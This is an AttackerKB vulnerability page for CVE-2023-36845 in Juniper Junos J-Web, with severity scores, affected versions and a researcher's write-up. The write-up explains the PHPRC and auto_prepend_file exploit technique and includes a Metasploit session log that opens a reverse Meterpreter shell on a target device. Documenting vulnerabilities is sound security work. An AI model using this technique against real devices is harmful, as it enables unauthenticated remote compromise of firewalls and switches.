AttackerKBAKB:1F73040E-99B9-4B2A-9CB2-CC4396338A3ACVE-2023-36845
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.379 Low
EPSS
Percentile
96.8%
A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series
and SRX Series
allows an unauthenticated, network-based attacker to remotely execute code.
Using a crafted request which sets the variable PHPRC an attacker is able to modify the PHP execution environment allowing the injection und execution of code.
This issue affects Juniper Networks Junos OS on EX Series
and
SRX Series:
- All versions prior to
20.4R3-S9;
-
21.1 versions 21.1R1 and later;
-
21.2 versions prior to 21.2R3-S7;
-
21.3 versions prior to 21.3R3-S5;
-
21.4 versions prior to 21.4R3-S5;
-
22.1 versions
prior to
22.1R3-S4;
- 22.2 versions
prior to
22.2R3-S2;
- 22.3 versions
prior to
22.3R2-S2, 22.3R3-S1;
- 22.4 versions
prior to
22.4R2-S1, 22.4R3;
- 23.2 versions prior to 23.2R1-S1, 23.2R2.
Recent assessments:
jheysel-r7 at September 21, 2023 5:02pm UTC reported:
This might be the most impactful CVSSv3 5.3 rated vulnerability you’ve ever (or never) heard about. The vulnerability affects Juniper’s SRX Firewalls and EX Switches and allows unauthenticated attackers to change environment variables resulting in remote code execution as the nobody user. I’m going to briefly go over the evolution of the research of this vulnerability as I found it interesting.
CVE-2023-36844 + CVE-2023-36845
The Juniper advisory was first analyzed by Sonny at watchtowr and they wrote a great blog outlining how they used this vulnerability along with CVE-2023-36844 in order to obtain RCE. CVE-2023-36844 is an arbitrary file upload function that exploits the do_upload function within the affected device. So what Sonny did was:
-
Use CVE-2023-36844 to upload a PHP file containing our shellcode
-
Use CVE-2023-36844 again to upload a second file, containing an auto_prepend_file directive instructing the PHP preprocessor to execute the file we uploaded in step 1
-
Use bug CVE-2023-36845 to set the PHPRC variable to the file we uploaded in step 2.
Just CVE-2023-36845
Using the clever research published by Sonny, Jacob Baines from Vuln Check posted a blog outlining how RCE can be obtained solely using CVE-2023-36845.
The affected Juniper devices use Appweb web server and when Appweb invokes a CGI script it passes arguments and environment variables in order for the script to access the users’s HTTP request. The body of the HTTP request is passed using stdin. Jacob noted that every FreeBSD process has access to their stdin by opening /dev/fd/0. So by sending an HTTP request, an attacker is able to introduce a “file”, /dev/fd/0 to the system.
So if the attacker set’s PHPRC equal to /dev/fd/0 and then uses the PHP function auto_prepend_file which causes the provided file to be added using the require function, in combination with allow_url_include which allows the use of URL-aware fopen wrappers. The attacker can then set auto_prepend_file equal to data://<payload_goes_here> so that the payload is provided inline and gets executed without ever being written to disk. Very cool.
Try this at home
There’s a great metasploit module available for this that can be found here and can be run like so:
msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set rhosts 192.168.0.247
rhosts => 192.168.0.247
msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set lhost 192.168.0.77
lhost => 192.168.0.77
msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > run
[*] Started reverse TCP handler on 192.168.0.77:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Environment variable manipulation succeeded indicating this target is vulnerable.
[*] Sending stage (39927 bytes) to 192.168.0.247
[*] Meterpreter session 4 opened (192.168.0.77:4444 -> 192.168.0.247:58995) at 2023-09-20 16:27:04 -0400
meterpreter > getuid
Server username: nobody
meterpreter > sysinfoi
[-] Unknown command: sysinfoi
meterpreter > sysinfo
Computer : JUNOS
OS : FreeBSD JUNOS JNPR-11.0-20200608.0016468_buil FreeBSD JNPR-11.0-20200608.0016468_builder_stable_11 #0 r356482+0016468ed6c(stable/11): Sun Jun 7 23:59:18 PDT 2020 [email protected]:/volume/build/junos/occam/llvm-5.0/sandbox-20200605/freebsd/
Meterpreter : php/freebsd
meterpreter >
References
<https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/>
<https://vulncheck.com/blog/juniper-cve-2023-36845>
Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 5
Related
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.379 Low
EPSS
Percentile
96.8%